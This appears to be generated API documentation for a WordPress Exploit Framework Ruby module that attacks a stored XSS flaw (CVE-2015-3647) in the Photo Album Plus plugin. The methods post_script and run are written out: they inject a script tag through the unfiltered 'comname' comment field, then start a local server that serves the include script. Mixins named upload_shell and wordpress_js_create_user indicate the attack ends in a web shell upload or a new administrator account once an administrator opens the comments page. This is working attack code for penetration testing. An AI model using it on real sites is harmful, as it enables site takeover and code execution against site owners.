Class: Wpxf::Exploit::PhotoAlbumPlusXssShellUpload

Inherits:
Module
  • Object
Includes:
Wpxf, Net::HttpClient, WordPress::Login, WordPress::Plugin, WordPress::Xss
Defined in:
lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb

Constant Summary

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

Methods included from WordPress::Xss

#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute, #upload_payload_using_plugin_form

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ PhotoAlbumPlusXssShellUpload

Returns a new instance of PhotoAlbumPlusXssShellUpload.



# File 'lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb', line 10

# Runs the parent constructor and then registers this module's metadata
# (name, description, authors, references, date) with the framework via
# +update_info+. No options are registered here; everything comes from the
# included mixins.
#
# @return [PhotoAlbumPlusXssShellUpload] a new instance of the module
def initialize
  super

  # Assembled from fragments so each line stays readable; the pieces are
  # joined with no separator, so the wording is exactly one description.
  description = [
    'The vulnerability exists due to the absence of filtration of ',
    'user-supplied input passed via the "comname" and "comemail" ',
    'HTTP POST parameters to "/wp-content/plugins/wp-photo-album-plus/',
    'wppa-ajax-front.php" script when posting a comment.',
    "\n",
    'A remote attacker can post a specially crafted message ',
    'containing malicious HTML or script code and execute it in ',
    'the administrator\'s browser in context of the vulnerable ',
    'website, when an administrator views images or comments in ',
    'the administrative interface.'
  ].join('')

  authors = [
    'High-Tech Bridge Security Research Lab', # Discovery and disclosure
    'rastating'                               # WPXF module
  ]

  references = [
    ['CVE', '2015-3647'],
    ['WPVDB', '7996'],
    ['URL', 'https://www.htbridge.com/advisory/HTB23257']
  ]

  update_info(
    name: 'Photo Album Plus 6.1.2 XSS Shell Upload',
    desc: description,
    author: authors,
    references: references,
    date: 'May 20 2015'
  )
end

Instance Method Details

#ajax_url ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb', line 46

# URL of the plugin's front-end AJAX script, built by appending the script
# name to {#plugin_url} via +normalize_uri+ from the HTTP client mixin.
#
# @return [Object] whatever +normalize_uri+ returns (presumably a String URL;
#   confirm against Net::HttpClient)
def ajax_url
  endpoint = 'wppa-ajax-front.php'
  normalize_uri(plugin_url, endpoint)
end

#check ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb', line 38

# Vulnerability check: delegates to the Fingerprint mixin, which reads the
# plugin's readme to determine the installed version. The version string
# passed here is assumed to be the boundary the mixin compares against
# (the module metadata names 6.1.2 as affected) — confirm the comparison
# semantics against +check_plugin_version_from_readme+.
#
# @return [Object] the result of +check_plugin_version_from_readme+
def check
  plugin_slug = 'wp-photo-album-plus'
  boundary_version = '6.1.3'
  check_plugin_version_from_readme(plugin_slug, boundary_version)
end

#plugin_url ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb', line 42

# Base URL of the Photo Album Plus plugin directory on the target, formed by
# appending the plugin slug to the WordPress plugins URL.
#
# @return [Object] whatever +normalize_uri+ returns (presumably a String URL;
#   confirm against Net::HttpClient)
def plugin_url
  plugin_slug = 'wp-photo-album-plus'
  normalize_uri(wordpress_url_plugins, plugin_slug)
end

#post_script ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb', line 50

# Submits one comment to the plugin's front-end AJAX endpoint. Every field is
# random filler except +comname+, which embeds the include script produced by
# the Xss mixin; +comname+ and +comemail+ are the two parameters the module
# description identifies as unfiltered.
#
# The random values are generated in the same order as the form fields so the
# request is built exactly as before.
#
# @return [Object, nil] whatever +execute_post_request+ returns; {#run} treats
#   nil as "no response" and inspects +code+ on anything else
def post_script
  photo_id = Utility::Text.rand_numeric(3)
  comment_text = Utility::Text.rand_alpha(50)
  email = "#{Utility::Text.rand_alpha(10)}@#{Utility::Text.rand_alpha(10)}.com"
  name = "#{Utility::Text.rand_alpha(8)}<script>#{xss_include_script}</script>"

  form = {
    'action'      => 'wppa',
    'wppa-action' => 'do-comment',
    'photo-id'    => photo_id,
    'comment'     => comment_text,
    'comemail'    => email,
    'comname'     => name
  }

  execute_post_request(url: ajax_url, body: form)
end

#run ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb', line 64

# Module entry point: stores the script-bearing comment on the target, then
# starts the local HTTP server that serves the include script.
#
# Only the HTTP status of the comment request is inspected: a 200 is taken
# to mean the comment was stored, the response body is not examined. Whether
# the stored comment actually executes depends on an administrator loading
# the comments management page, which this method does not verify.
#
# @return [Boolean] +false+ if the parent's +run+ fails, no response arrives
#   or the status is not 200; otherwise the value of +@success+, which this
#   method only initialises to +false+ — it is presumably updated by the Xss
#   mixin's HTTP server callbacks (confirm against #on_http_request /
#   #xss_shell_success) before +start_http_server+ returns
def run
  return false unless super

  # Success is decided by another procedure; start from a known false value.
  @success = false

  emit_info 'Storing script...'
  emit_info xss_include_script, true
  res = post_script

  # Fold both failure conditions into a single message lookup; a nil response
  # is checked first so +code+ is never read from nil.
  failure = if res.nil?
              'No response from the target'
            elsif res.code != 200
              "Server responded with code #{res.code}"
            end

  if failure
    emit_error failure
    return false
  end

  emit_success "Script stored and will be executed upon visiting /wp-admin/admin.php?page=wppa_manage_comments"
  start_http_server

  @success
end